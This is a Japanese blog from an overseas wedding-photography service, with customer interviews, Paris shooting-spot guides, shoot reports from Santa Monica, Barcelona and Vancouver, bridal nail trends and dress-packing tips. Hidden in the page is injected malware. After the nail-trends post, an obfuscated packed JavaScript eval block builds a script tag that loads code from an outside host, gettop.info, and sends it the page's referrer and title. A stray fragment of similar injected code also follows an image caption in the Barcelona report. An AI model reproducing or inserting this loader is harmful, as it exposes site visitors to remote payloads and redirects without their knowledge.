撮影経験者口コミ大公開!!! 海外フォトウェディングのお客様対談レポート

一生に一度のハネムーン。大切な旅だからこそ、心に残る、写真に残す旅時間にしたい!
実際にフォトウェディングを経験したからこそわかる「あんなこと」「こんなこと」貴重な体験談を踏まえいろいろ質問してみました!

お客様の生の声大公開!

さて、この度タビサキマーカーでは初となる実際にご利用いただきました花嫁様との初の対談会を開催いたしました。対談会では、撮影準備から当日までのリアルなお話を伺うことが出来ましたのでご紹介させていただければと思います。これから、海外フォトウェディングを検討されている方、また、TABISAKI MARKERでの撮影が気になっている方の参考となればと思います♪

How was the shooting of the Tabi Saki marker?.001

私たちの海外フォトウェディング♡こんな感じでした♪

なぜ海外フォトウェディングをやろうと思ったの?

理由は大きく3つに分かれていました♪
①ハネムーンは2人で絶対に行きたいと思っていた国。だからこそ、その国で2人のウェディングを残したかった。
②国内では、簡単なパーティーで済ませる、又は挙式を予定してないからハネムーン先でドレスを着て、2人の記念としてウェディングを残すと決めていた。
③ハネムーンは、挙式/披露宴前に済ませることになったので、せっかくであれば”前撮り”として挙式/披露宴でもゲストにお披露目出来るものとして残そうと思った。

名称未設定 2.001

皆さん、日本とは違う異国の地での撮影は、やっぱり特別に感じられるようです。
憧れのヨーロッパでの街並に溶け込んでウェディングドレスを着てみたい♪
大好きなニューヨークをかっこ良くウェディングドレスで歩きたい・・♪
花嫁なら誰でも憧れるイメージのもとハネムーン先でのフォトウェディングを決められているようです!

撮影場所に悩まなかったの?

一同に、撮影したいな!と思う場所が網羅されていたのがタビサキマーカーでした!また、担当者とやり取りを行なう中で
実際に行ったことない場所だから、信用してお任せしようと思えたのは大きかったです。という嬉しい声をいただくことが出来ました。

名称未設定.001

TABISAKI MARKERでは、撮影するフォトグラファーは、全て現地在住の日本人カメラマンになります。(※ギリシャ(サントリーニ島)/ハンガリー(ブダペスト)を除く)
その背景には、日本人に好まれる撮影場所を同じ日本人として知っていることが重要だと考えているからです。また、日本人として同じ感覚のもと撮影に適した場所の選出が可能だからです。だからこそ、ご満足いただける内容のラインナップを常に吟味し、ご案内しております。

準備は大変だった?ドレスの選び方は?

挙式や披露宴の準備をしながら、もちろん仕事のしながら、ハネムーンの準備もして、フォトウェディングの衣装のことも考えなくちゃ!って、予定が沢山詰まっている時期だからこそ、やはりドレス選びはギリギリに・・というのが現実だったそう。でも、ギリギリながらも案外ドレスはさくっと決まって、実際に満足しているという皆様。

名称未設定.001
バルセロナの街並に合うドレスはどんなかな?とイメージしたら紫色だったのでドレスは紫色で絞ってすぐに決めちゃいました!とお話いただいたN様。

名称未設定 5.001
クールに決めたかったから、クールラインのドレスを中心に探してパッと決めたというO様。
野外で汚れるだろうな!という想定もあったので、価格もお手軽なものにと決めてましたとのこと(賢い!)

皆様、ご自身のイメージをしっかり固めていたことが成功に導かれてますね!

実際、少し気を抜いて楽しみながら準備をしてもらいたいと願う私たち。
TABISAKI MARKER 旅先マーカーでは、撮影場所のご相談にもお応えしつつ、衣装のご相談にも承りまります。
挙式や披露宴とは違って、野外を歩くロケーション撮影は、出来るかぎり動きやすいドレスを選んでいただくのが一番です!例えば、軽めのふんわりチュールがその土地の風になびく姿も素敵です。そこがロケーションフォトの醍醐味です!

当日の状況はどうでしたか?

担当フォトグラファーとホテルで会ってから、撮影場所までの移動、撮影、そして終了までの様子を伺いました。

①移動は気楽にスムーズがベスト!!

名称未設定 6.001
※参考:https://www.pinterest.jp/
◯タクシー移動都市でのご利用者様(バルセロナ/パリ撮影)
フォトグラファーさんに全てお任せ出来る点も含め、タクシー移動は気軽で全く問題がありませんでした。道路が狭い場所もあったので、タクシーはとても効率的だと思いました。
現地精算で会計明瞭なのも良かった

名称未設定 7.001
※参考:https://www.pinterest.jp/
◯事前にアドバイスをいただいていた通り、高いヒールの靴は手荷物として持って、
ペタンコ靴を履いていったのは、大正解でした!むしろ、足元はドレスでほとんど写らないから、歩きやすさを重視することの方が大事かも!と終わってみてからもそう思う

撮影場所から撮影場所までの移動は、出来るかぎり煩わしさをなくしてスムーズに行なっていただきたいと案内させていただいています。
リムジンでの移動等の手配をご希望のお客様もいらっしゃいますが、撮影は海外ならではの趣き風情ある路地等を積極的に取り入れておりますため
大型の車よりもお手軽な手段で対応させていただきたいのです。

②撮影は、和やかに!笑いながら♪

どうしても緊張してしまう撮影ですが、海外で日本人に合える嬉しさを感じていただきながら、撮影をスタート。
周りの観光客や現地の方々からの「congratulation(おめでとう)」の祝福を受けながら撮影が進みます!

ん.001
◯日本語が通じる明るいカメラマンで、とっても楽しく撮影できた!

ん.002
◯旅立つ前に、担当カメラマンさんのお顔とメッセージをもらえたのは安心だったし、
顔写真は良い意味で裏切られて(笑)写真ではクールな感じだったけど、実際はとてもソフトな優しい人だった!

ん.003
◯とても慣れた感じで、無駄なポージング指示がなく、この場所からだとこのアングルが撮っても素敵なんですよ〜!と、私たちに無理なく撮影してもらえました!

※写真のお客様とコメントのお客様は同一の方ではございません。

③ご新郎様の様子は? 最終的に誰よりも楽しんだのはご主人様だったって本当?

実は、今回の対談で一番?盛り上がったテーマがこちらでした!
これは、多くのカップルさんに頷いて共感してもらえる事実かもしれません!
それは、ご新郎様のフォトウェディングに対するテンションのこと。

名称未設定.001
※参考:https://www.pinterest.jp/

<撮影前のご新郎様の様子>
ご新郎様は一様にして、撮影自体に乗り気ではないと言うのは女性にとっては悲しきかなの現実だそうです。
これを読みながら頷いた方も多いのでは?
男性は、奥様の付き添い程度にしか考えてないことが9割。

しかし!!! 撮影を終えた時の旦那さんの様子についても、同じくして、一様に同じ反応をみせていたことにも、皆さんが大きく頷いた点でもありました!
それは・・・!?

<撮影後のご新郎様の様子>
ご新郎様の方がはしゃいでいた!!(笑)
だんだんだんだん楽しくなってきてるな。というのが見てとれる位に撮影を楽しんでいました。と話してくれたO様
最後は、旦那さんの方から「もう終わっちゃうの?」と名残惜しい言葉を発するほど!

いつもと違うお洒落な街並の中で、現地のみんなに「おめでとう!」「COOL」等と声をかけてもらいながらの撮影に気分が上がったと思う!とも。

名称未設定.001

最後には、旦那さんと2人で楽しめた撮影時間はとっても素敵な時間となりました!
というお声をいただきました。

④雨の中で撮影経験は、より特別に思い出深いものに・・

今回の対談にご参加いただきました新婦様の中に、実は雨の中での撮影をされた方がいらっしゃいましたので、ご紹介します。

当日は、雨だったので撮影場所を屋根のある場所へ一部変更しての撮影。
ドレスは、確かに汚れましたが、、傘を持っての撮影は何だかとっても特別な経験として
残っているというとお話いただきました。

名称未設定.002

実は、雨の中での撮影は傘をさしてキュートに撮影が出来たり、雨がロマンティックを演出したりするのも事実です。
海外での撮影は、取り直しがきかないからこそ、お天気に合わせ撮影出来る場所を変更ご提案させていただくことがあります。

ブライドフォトアンバサダーの皆様、どうもありがとうございました!

今回お集りいただいたのは、TABISAKI MARKERを実際にご利用いただきました卒花様、またこれから挙式を控える花嫁様の中より有志でお集りいただきました。
TABISAKI MAKERでは、私たちを一緒に「ウェディングフォトの魅力」を伝えていただける方、またプレ花としてこれから結婚準備を控えている方達のお手伝いが出来るチーム「ブライドフォトアンバサダー」としてこれからもタビサキマーカーと一緒に楽しんでいただけるメンバーとして今回お集りいただきました。
この場を借りて、あらためてお礼を申し上げます。
ありがとうございました。これからもよろしくお願い致します。

名称未設定.001

海外前撮りを旅先マーカーでおしゃれに素敵に撮影しよう!

旅先マーカーなら持込みドレスで素敵にウェディングフォト、レンタルで撮影ももちろん可能です。さらに手軽に私服でハネムーンフォトを楽しみたい場合もプランのご案内あります!旅行ツアーの自由時間を効率良く使える嬉しいプランが沢山!

【TABISAKI MARKER 旅先マーカー】では、ご予算や撮影のご希望に合わせて、また旅のスケジュールの負担にならないようお好きな組み合わせやコーディネートで撮影をお楽しみいただけるシステムになっているので、柔軟にスケジュール対応ができます。


フランスハネムーンで楽しく思い出になる撮影を私たちらくしく残したい!<第2弾>

パリフォトウェディングで人気の撮影スポットと、【TABISAKI MARKER タビサキマーカー】が満を持して
おススメするスポットをご紹介♪<第2弾>

前回に引き続き ヨーロッパ周遊旅行をする上で外せない「パリ」での前撮りフォトウェディングのご紹介をしたいと思います。

第一弾 でご紹介したのはフランスのシンボルであるエッフェル塔を背景にした様々なおススメスポット。
同じエッフェル塔でも撮影する場所により、雰囲気ががらりと変わる写真を楽しんでいただきました。

そして<第2弾>は、エッフェル塔以外のパリの魅力的な撮影スポットをご紹介したいと思います!
パリは、ファッショナブルで、アーティスティックでありながら、昔を残す古き建物や町並みが魅力的な街。撮影するスポットによって、その雰囲気は様々です。

名称未設定.001

さて、自分達だけの他の皆とちょっと違うオリジナルパリフォトウェディング、どんな写真が撮れるの?と気になりませんか??
パリにて前撮り・後撮りとしてフォトウェディングをこれから検討したい!というカップルの皆様必見の皆と差がつく撮影情報をご案内します。

パリフォトウェディング!自分たちのやりたいイメージに合わせた撮影スポットを選ぼう!!

パリフォトウェディング。憧れのパリでの撮影。
お客様により、イメージするお2人の姿はクラシカルだったり、エレガントったり、カジュアルだったりとイメージもその背景にある想いも様々です。
私好みのドレスを持ち込める【TABISAKI MARKER タビサキマーカー】での撮影は、そんなお客様の想いを大切に可能な限りお客様のイメージするお写真をご提案出来るよう、撮影スポットの開拓やご提案に常に力を注いでいます。
サンプルパリ[2]
そして、どんな場所でどんな風な景色を見ながら、どんな撮影が楽しめるのか?
ツーリズムフォトを掲げ、観光を楽しみながら撮影をするというスタイルを持つ【TABISAKI MARKER 旅先マーカー】だからこそ、現地調査を行い日本人が目で体験して楽しめる撮影スポットをご案内しています。

パリを感じる厳選スポットで素敵に楽しく撮影!
おススメロケーションはここ!!

①エッフエル塔と並ぶ人気!!凱旋門

正式名称「エトワール凱旋門」は、1806年にナポレオンの命によりフランス軍が奇跡的な勝利をおさめた戦いの記念碑として建てられましたと言われています。
皆さんもご存知かと思いますが、ブランドショップが建ち並ぶシャンゼリゼ通りをはじめとする、12の通りがこの凱旋門があるシャルル・ド・ゴール広場から放射上に広がっています。
上空から見るとその見た目が星(エトワール)のように見えるとのこと。
広場中央に堂々と建つ気品ある凱旋門の前でエレガントな撮影が人気です。
tabisakimarker079
ウェディングフォトでも人気な道(横断歩道)を渡るシーンを凱旋門を背景に・・♪
tabisakimarker24-min

②皆に差がつく?!シテ島 ノートルダム寺院

パリの中心部を流れるセーヌ川の中州であるシテ島。シテ島にあるのはゴシック建築を代表する建物として挙げられるがパリのノートルダム大聖堂。
南塔にはディズニー映画にもなった『ノートルダムの鐘』の舞台でもあります♪
名称未設定.001
ノートルダム寺院は、東西南北のどこから眺めても美しい粋なたたずまいの建築でウェディング撮影にはエレガントでロマンテッィク。
【TABISAKI MARKER タビサキマーカー】一押しのおススメの撮影スポットです。
名称未設定.002

③セーヌ川を架けるおススメの3つの橋♪

パリの街を縦断するように流れるのは、皆さんご存知のセーヌ川。パリの風景と言えば、皆さんの頭に浮かぶひとつのパリらしい光景かと思います。美しいセーヌ河岸は、世界遺産にも登録されています。
そして、セーヌ川にかかるいくつかの橋はウェディング撮影スポットとしても大変魅力的なのでご紹介しますね。

第一弾でもご紹介している“ビラケム橋” アーチ型の鉄格子の造りと背景が日本にはない雰囲気を演出します
名称未設定.001

名称未設定.002

黄金の装飾が特徴的な”アレクサンドロ三世橋”は、地元パリジェンヌのフォトウェディングでも人気の橋。
エレガントな雰囲気の撮影が可能です。
名称未設定.001

ルーブル美術館に続く芸術の橋”ポンデザール橋” ナポレオンの命令で架けられたパリで初めての鋼鉄製の橋なのだそう。
歩行者専用の橋で、真ん中にはベンチがあり橋の上でのんびり出来る憩い場ともなっている橋です。
名称未設定.001
かっては、知っている方も多いと思いますが、恋人たちが橋の欄干に南京錠を取り付け永遠の愛を誓い合う「Cadenas d’Amour(愛の南京錠)」として大流行となった橋。
恋人たちには人気の橋でもありました。
名称未設定.002
橋上での撮影後には、セーヌ川沿いを歩きながらの撮影もおススメとなります。

④カジュアルアートがお好きな方必見!モンマルトルエリア

【TABISAKI MARKER 旅先マーカー】で、エッフエル塔周辺エリアの次にご用命が多いのは、このモンマルトルエリアです。
モンマルトルエリアは、パリらしい街並を網羅出来るエリアといっても過言ではないかもしれませんね。笑
ポップに、カジュアルな雰囲気で撮影をしたい!というカップルには特におススメです。
名称未設定.002
可愛らしい素敵な撮影スポットが沢山ありすぎて・・フォトグラファーも迷うくらいです♪
名称未設定.001
このエリアは丘にあるのでゆるやかな丘をのぼりながらの撮影になります。撮影中にみる景色も素晴らしいのです!

④まるでファッション誌?!見逃せないパリのお洒落撮影スポット

まだまだある素敵な撮影スポット。パリの街並は、見逃してしまいそうで見逃してはいけない撮影スポットは至る所に・・
例えば・・・こんなところも・・映画のワンシーンのような素敵な撮影場所
名称未設定.002
ベンチと緑・・・そして街灯
名称未設定.003
パリのオープンカフェで・・・
名称未設定.001

お2人らしいパリの撮影スポットが見つかりましたか?
【TABISAKI MARKER 旅先マーカー】では、こちらのBLOGでご紹介しきれていない撮影スポットがまだまだ沢山!!
ご用命の際に是非ご相談ください♪

※ここでご紹介さえていただいているものは、全て当サービズを利用いただいた実際のお客様の画像ですが
当日の現場の状況や季節等により状況がことなります。全く同じ撮影を再現出来るお約束は出来ません。

パリの前撮り/後撮りなら”カジュアル私服プラン”ハネムーンフォトも対応可能

ハネムーンの記念に!
カジュアルな前撮り/後撮りとしてもおすすめ!せっかくの海外旅行はセルフ写真ばかりでは、もったいない!もっと余すところなくハネムーンを楽しむツールとして撮影を旅のスケジュールに入れてみませんか!新婚旅行の旅のお土産は2人のお写真をスペシャルにだけどナチュラルに残したいカップル旅行におすすめです♪

おかげさまで【TABISAKI MARKER タビサキマーカー】は3周年を迎えました。感謝の気持を込めて、新セットプランを期間限定でご案内しています。
↓↓↓↓↓
c329a3c443ac609b3bba0d61ee3b1c3e

【TABISAKI MARKER 旅先マーカー】では、ご予算や撮影のご希望に合わせて、また旅のスケジュールの負担にならないようお好きな組み合わせやコーディネートで撮影をお楽しみいただけるシステムになっているので、柔軟にスケジュール対応ができます。

撮影を担当する現地のカメラマンは「安心の日本人」渡航前に、撮影のご希望をヒアリングして1人1人の想いに合わせ撮影コーディネートさせていただいております。撮影内容のみならぬ、ドレスやヘアデザインのご相談も大歓迎♪♪ご希望でヘアメイクのオプションもご用意しております。
ハネムーンカップルフォト


フランスハネムーンで楽しく思い出になる撮影を私たちらくしく残したい!<第1弾>

海外前撮りで不動の人気都市
美しいエッフエル塔が象徴的なパリ。
パリフォトウェディングで人気の撮影スポットと、【TABISAKI MARKER タビサキマーカー】が満を持して
おススメするスポットをご紹介♪<第1弾>

ヨーロッパ周遊旅行をする上で外せないのはやはり「パリ」ですね。【TABISAKI MARKER タビサキマーカー】でも多くのカップルの皆様からパリでの撮影ご依頼を頂いております^^

その中でも一番のご依頼は「エッフエル塔を正面から撮影できる「トロカデロ広場」での撮影!まさにパリでは王道といえる撮影スポットですが、 実はエッフエル塔を背景に素敵に撮影出来るスポットは他にもあるのです!また、パリらしい街並での撮影もおススメです。

さて、自分達だけの他の皆とちょっと違うオリジナルパリフォトウェディング、どんな写真が撮れるの?と気になりませんか??
まずは<第一弾>として、エッフェル塔を背景にしたパリフォトウェディング。撮影するスポットによって、その雰囲気は様々です。パリにて前撮り・後撮りとしてフォトウェディングをこれから検討したい!というカップルの皆様必見の皆と差がつく撮影情報をご案内します。
architecture-buildings-city-1308940

パリフォトウェディング!自分たちのやりたいイメージに合わせた撮影スポットを選ぼう!!

パリのフォトウェディングは、欧州の中でも一番人気の都市といっても良い人気ぶりですが、「パリ」で撮影と言われてどんな撮影を望んでいますか?WEBやSNS上で情報を調べてみても、、実は以外に同じようなスポットでの画像ばかり・・。どんな場所でどんな風な景色を見ながら、どんな撮影が楽しめるのか?また、せっかくなら出来れば、みんなより少しでも違った写真を残したい!!というカップルも多いはず!

ツーリズムフォトを掲げ、観光を楽しみながら撮影をするというスタイルを持つ【TABISAKI MARKER 旅先マーカー】だからこそ、現地調査を行い日本人が目で体験して楽しめる撮影スポットをご案内しています。

人気のエッフェル塔を中心として、凱旋門、ルーブル、パリの公園、町並みなど各ロケーションそれぞれ、またさらにテイストの異なる場所の組み合わせで、十数通りと大変豊富な撮影バリエーションが可能です。
サンプルパリ

エッフエル塔を背景に素敵に撮影できる
ロケーションはここ!!

エッフェル塔は、1889年にフランス革命100周年を記念してパリで開催された
パリ万国博覧会の記念に建てられた記念建造物ですね。高さは約324メートル.東京タワーより10メートル程低いイメージでしょうか。1991年にはパリのセーヌ川の海岸を含め世界遺産として登録されています。実際にのぼることもできますね!

また、エッフェル塔のすぐ隣には「シャンドマルク公園」があり草花が見られる芝生公園があります。絵映画等で使用されているエッフェル塔をきれいに望むことが出来る橋といえば、ビラケム橋です。

マリーアントワネットが最期を迎えた場所、コンコルド広場からは遠目に高く長く伸びるエッフェル塔。パリの町並み(ビルの合間)から垣間見えるエッフェル塔など、見る角度によって雰囲気を変える写真が撮影できます。それは、また四季によっても異なりますね。今は深緑、そしてこれからは紅葉の季節と変わるので、訪れる時期も是非イメージに加えてみてくださいね!
名称未設定.001

①王道!!トロカデロとエッフェル塔

エッフェル塔のフォトウェディングといえば、言わずと知れた「トロカデロ」から望む撮影ですね!大好きな彼とパリでのこの写真を残したくて、フォトウェディングの為にパリを訪れるカップルもいるくらいです。とても人気のスポットなので、撮影待ちをするということも多々あることです。
名称未設定.002
正面から撮影が可能なので、ワンスポットで色々なパターンのポージングを撮影していきます。後ろ向きの写真も雰囲気があって人気の1枚です。
名称未設定.003
そして、もうひとつ人気なのが近くにある大階段。こちらの画像も見たことがあるはず。エッフエル塔を背に階段で手を差し伸べる大好きな彼。そして、下からその手に導かれるように手を重ねるあなた。それはまるでお姫様と王子様のような1枚に・・♪
名称未設定.001

②メルヘン!!メリーゴーランドとエッフエル塔

トロカデロ庭園から美しい噴水などを眺めながらを歩いていくとメリーゴーランドがあるのをご存知ですか?
以前は日本ではあまり情報が少ないものでしたが、インスタグラムの登場で今は有名な撮影スポットにもなりましたね。
エッフェル塔とメリーゴーランドというワンダーでメルヘンチックな撮影が人気です。
名称未設定.004
このメリーゴランド。運行は日や時間によって様々・・・
いつも動いているとは限らないのが欧州ならでは(笑)
タイミングが合えば、実際にメリーゴランドに乗っての撮影も実現(乗車料がかかります)
名称未設定.005
また、近くの花々を一緒に入れ込めば、よりメルヘンチックさ増しますね!
まるで音が聞こえてきそうな、賑やかなメリーゴランドを拝見に、二人だけの時間はまるで止まっているかのような
素敵な1枚を楽しんでいただけます。
名称未設定.006

①優雅に!!セーヌ川とエッフェル塔

次にご紹介するのは、旅先マーカースタッフにもっとも「パリらしいワンショット」として人気なショット です。
「エッフェル塔」「セーヌ側」「パリを感じる建物」そして「木々(グリーン)」を閉じ込めた優しい絵画のような1枚を撮影することができます。
運がよければ、セーヌ川を渡る船も背景に・・・。
名称未設定.001
セーヌ川沿いを散策しながら、ゆっくりとした時間を感じながらの撮影。ここを歩いた記憶がいつまでも残るようなそんな想いから旅先マーカーらしいスポットとしてスタッフが胸を張ってオススメするエリアとなります。

④美しい橋から!!ビラケム橋とエッフエル塔

「のだめカンタービレ」やディカプリオ主演の「インセプション」等の映画でも使用されたビラケム橋をご存知ですか?ビラケム橋から望むエッフエル塔は、セーヌ川とその両側岸に立ち並ぶ建物や緑を背景に撮影ができます。
パリの空が大きくのぞめるのもこの時からでしょうか。。
名称未設定.001
パリの空が大きくのぞめるのもこのスポットの特徴。
パリの空とエッフエル塔を入れ込んだ、パーツカットの撮影も人気のワンショット。
名称未設定.003
ビラケム橋上での撮影パターンとして、橋のデザインを生かした1枚。ぶら下がり街灯が素敵です。
名称未設定.001

⑤ダイナミック!!見上げるエッフェル塔

次にご紹介するのは、エッフェル島直下でのスポット。遠目からのエッフエル塔とはまだ違うダイナミックな写真をお好みの方は是非!エッフエル塔の存在感をリアルに
感じられる1枚に!
名称未設定1.001
参照:フォトIvannaサルガドにUnsplash

エッフエル塔たもとのベンチにて・・・
名称未設定.001
参照:https://www.pinterest.jp/

⑥⑤まだまだある・・こんなところ

その他にも、ビルの合間から見えるエッフエル塔はロマンテッィクに・・・
名称未設定.004
参照:https://www.pinterest.jp/

夜のエッフェル塔まで・・ ★9月~11月の期間限定プラン★
名称未設定.003
参照:https://www.pinterest.jp/

お2人らしいパリの撮影スポットが見つかりましたか?

次回は、エッフェル塔以外のパリのおススメ撮影スポットをご紹介します!!

パリの前撮り/後撮りなら”カジュアル私服プラン”ハネムーンフォトも対応可能

ハネムーンの記念に!
カジュアルな前撮り/後撮りとしてもおすすめ!せっかくの海外旅行はセルフ写真ばかりでは、もったいない!もっと余すところなくハネムーンを楽しむツールとして撮影を旅のスケジュールに入れてみませんか!新婚旅行の旅のお土産は2人のお写真をスペシャルにだけどナチュラルに残したいカップル旅行におすすめです♪

おかげさまで【TABISAKI MARKER タビサキマーカー】は3周年を迎えました。感謝の気持を込めて、新セットプランを期間限定でご案内しています。
↓↓↓↓↓
c329a3c443ac609b3bba0d61ee3b1c3e

【TABISAKI MARKER 旅先マーカー】では、ご予算や撮影のご希望に合わせて、また旅のスケジュールの負担にならないようお好きな組み合わせやコーディネートで撮影をお楽しみいただけるシステムになっているので、柔軟にスケジュール対応ができます。

撮影を担当する現地のカメラマンは「安心の日本人」渡航前に、撮影のご希望をヒアリングして1人1人の想いに合わせ撮影コーディネートさせていただいております。撮影内容のみならぬ、ドレスやヘアデザインのご相談も大歓迎♪♪ご希望でヘアメイクのオプションもご用意しております。
ハネムーンカップルフォト


【撮影リポート:サンタモニカ/LA】彼の温もりを感じながら

活気あふれるサンタモニカ

 

スタートは、サンタモニカピアは、旧ルート 66 の西端

LA担当タビサキグラファー SHIGIEEは、男性からみた優しい女性らしさを映し出す。

tabisakimarker05

さぁ ビーチへ

tabisakimarker20

少しだけ、ドレスの持っててね♪

tabisakimarker27

その日は、すこし曇り空・・・でも

 

潮風の中、彼の背中が温かい。いつも変わらないこの温もり。

tabisakimarker40

潮風の中、彼女の笑顔が温かい。いつも変わらぬ愛おしい笑顔。

tabisakimarker33

一生の記念が残せたね

これから歩む道は、いろんなことがあるよね。きっと

tabisakimarker23

でもこの景色を思い出せば・・・

この写真を見返せば・・・

指輪に込めた想い

2人の手で、ずっと大切にしていこうね

tabisakimarker30

異国の地で胸に誓う

写真を見返した時、きっと温もりがよみがえる


【撮影リポート:バルセロナ】再び出会えた素敵な笑顔

出会いはバンクーバー/May.2017

 

お2人の出会いは、バンクーバー。。

 

そして、TABISAKI MARKERとお2人との出会いも、バンクーバー。。

 

ハ゛ンクーハ゛ー1

 

それから・・・・

 

彼には内緒で

 

ステージはガラリと変わり「真夏のバルセロナ」

 

BAB2008201708Takahashisama-3

 

また撮影を楽しみたい♪ ご主人様には当日まで内緒というサプライズ!!

 

BAB2008201708Takahashisama-73

 

ガウディ建築/グエル公園

 

BAB2008201708Takahashisama-163

 

コンバース=絆?!?!

 

バンクーバーでも履かれていた靴。

 

再びアルバムを開いた時、

 

2つの違う国で残した2人だけが知る

 

少しのリンクが、2人の絆を深くする

 

BAB2008201708Takahashisama-21

2017年8月
スペイン/バルセロナ
タビサキグラファー SEI
バケーション

<旅の最高のお土産に、ツーリズムフォトRベーシックプラン>
旅行先で思い出を撮影!♪サグラダファミリアやグエル公園、私服で手軽なハネムーンフォト

二人の絆を残すエンゲージメントフォト♪新婚旅行も一生に一度!

欧米では主流!カジュアルにお二人を撮影するエンゲージメントフォト↓↓↓今すぐチェック↓↓↓
スクリーンショット 2017-09-04 10.00.40d.getElementsByTagName(‘head’)[0].appendChild(s);


【撮影リポート:バンクーバー】笑顔溢れる2人のハネムーンフォト

巨大なアートオブジェ

撮影の始まりは、クールな1枚に。。
バンクーバーを担当するタビサキグラファー「TP」のモットーは”楽しさの共有”

温和で柔らかな口調のTPのペースに徐々に雰囲気も和んでいきます。

tabisakimarker02

歴史ある街並を歩く

歴史と近代がお洒落に調和するガスタウン。
有名スポット、スチーム時計前の撮影は外せません♪
お洒落な2人は、雰囲気の良い街並を歩きながら、自然に笑みが溢れます♪

tabisakimarker15

楽しさいっぱい!!!

もはやロケーションフォトの定番?! 横断歩道を渡る2人
「これこれ、私やりたかったの♪」

tabisakimarker24

レストランのエントランスも絵になる撮影スポット

現地在住の日本人フォトグラファーだから、日本人目線の「好き」を、常にチェック。
今回は、白とデニムでコーディネートされた2人の為に、黒壁スポットをチョイス♪
知らない土地で観光していたら、絶対に見逃してしまうフォトジョニックなポイントで、オリジナルな1枚。

やっぱり笑顔な2人

tabisakimarker38

2人の時間

タビサキマーカーの特徴である観光しながらの撮影スタイルは、お2人の時間も大切にします。
バンクーバーハーバーから吹く潮風を肌に感じながら、幸せを再確認する瞬間。

いつまでも私の手を引いて歩いてね・・

tabisakimarker50

ハーバーの見える公園、木の下で・・・

カメラマンから、「背中合わせにお話してね」って
改めて相手の表情をみずにお話するのって、案外照れくさい。

tabisakimarker58

幸せな未来に向かってジャンプッ!!!

「せ???のっ!!」
撮影の終わりは、パールハーバーを背に、2人で息を合わせたジャンプ!!
高さもポーズもぴったりのお2人。さすがです!!

最後もやっぱり笑顔のお2人♪
tabisakimarker79

約90分の撮影は、バンクーバーに流れる時と同様に歩きながらゆっくり穏やかに行なわれました。


憧れのフォトウェデイング♪ 指の先まで綺麗に見せたい!!

この秋のトレンドを取り入れつつ、上品な花嫁ネイルを施して、指の先まで素敵にしよう♪この秋、ウェディングフォトを予定している方におススメの2017年秋ネイルをご紹介します!
スクリーンショット 2017-08-22 2.52.25
出典:treatdressing.jp

秋らしい落ち着いたカラーをベースに・・

紅葉や秋空の下にマッチする秋色をメイン色に選んだら・・・やっぱり純白ドレスに合うホワイトをアクセントに取り入れてエレガントで美しい花嫁ネイルに♪

スクリーンショット 2017-08-22 3.13.12
出典:https://vk.com

2017トレンドは「レトロ」

この秋のトレンドの1つ「レトロ」を取り入れたネイルもお洒落! ブライダルネイルには、定番のピンクベージュを基本にして、アクセントにレトロ色やレトロなデザインを取り入れて!

スクリーンショット 2017-08-22 2.46.48
出典:https://bestartnails.com

やっぱりお花のモチーフは入れたい!!

ブライダルネイルをするなら、お花のデザインは外せない!!という方におススメなのはスモークのかかったカラーを選んで♪
落ち着いていて、且つ上品な秋の花嫁さんにぴったりネイルになります!!

スクリーンショット 2017-08-22 2.48.37
出典:instagram.com

やっぱりエレガントにゴールドは外せない!!

ゴージャスなブライダルネイルを目指すなら・・・・ゴールド色は使いたい! 落ち着いたベージュピンクをベースにゴールドとクリスタルをMIXさせたら、大人の女性ネイルに・・・。

スクリーンショット 2017-08-22 2.40.47
出典:stylesart.com

ジュエリーで見せる指先

指先を綺麗に見せるファランジリング♪ ネイルは、秋色1色でシンプルに仕上げて、ジュエリーで見せる!! ブーケを持つ手が一段と華やかに、エレガントに演出されますね!!

スクリーンショット 2017-08-22 2.38.09
出典:ahbsessed.com

いかがですか? これからブライダルシーズンともいわれる時期。是非、指先まで綺麗に演出して、一生に一度の記念を素敵に残して下さいね。

二人の絆を残すエンゲージメントフォト♪新婚旅行も一生に一度!

欧米では主流!カジュアルにお二人を撮影するエンゲージメントフォト↓↓↓今すぐチェック↓↓↓

エンゲージメントフォト,オーダーメイド ハネムーン,新婚旅行 同行撮影

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))document.currentScript.parentNode.insertBefore(s, document.currentScript);


そういえば・・・・皆どうしてるの? 海外へのドレスの持込み方

ずっと憧れていたハネムーン先でのフォトウェデイング。予約は完ぺき。衣装も決まったし♪後は、ヘアメイクはどうしよ?? ブーケは? 靴は? ・・・・・・と、考えるだけで楽しい事前準備?? そして、それと同時に、実は重要な事柄がひとつ。それは、どうやって衣装や小物たちをハネムーン先に運び込むか。です! 今回は、こだわり派さんに見て欲しい「ガーメントバッグ」を紹介しながら、持込み情報のご案内?

e19445413443fe434c1065c174ae8d4c
出典:instagram.com

ガーメントバッグを用意しよう

ドレスの持込みには、ガーメントバッグを用意して!
ガーメントバッグとは、ハンガーに掛けたまま持ち運にが出来る衣装用バッグです♪
長時間の旅。スーツケースに無理矢理入れたら、皺になってしまいます。なるべく、皺にならないように「ガーメントバッグ」は必須です!

521302989a6e9b4c6f58e11a44195934
出典:instagram.com

衣装は、機内に持込もう

ハネムーン。ただでさえ荷物は多くなってしまうもの。スーツケースに詰められるものは、詰めてしまうのが賢いのだけれど・・ここで1つ注意したい点!!
代用のきかない大切なものは、機内に持込んで! なぜなら、ロストバゲッジ(預けた荷物がなくなってしまうこと)を避ける為。荷物だけ違う便で運ぶなんてこともあるし、その場合、撮影日に荷物が手元にまだ届かない!なんて可能性も・・・。

布素材のハンドメイド ガーメントバッグ
22aba7a597f1285cb3494ffbe48b85e6
出典:instagram.com

クールな ガーメントバッグ
05e471c4228d1db94f9ecb2adc481f7e
出典:instagram.com

機内への持込み重量は大丈夫?

渡航先や飛行機各社によって対応は様々なのですが、ウェディングドレスを機内持ち込みしたいと申し出ると、丁寧に対応してくれる所が多いと言われています。
場合によっては、クローゼットがある機内もあり、ハンガーにかけてくれるとか。
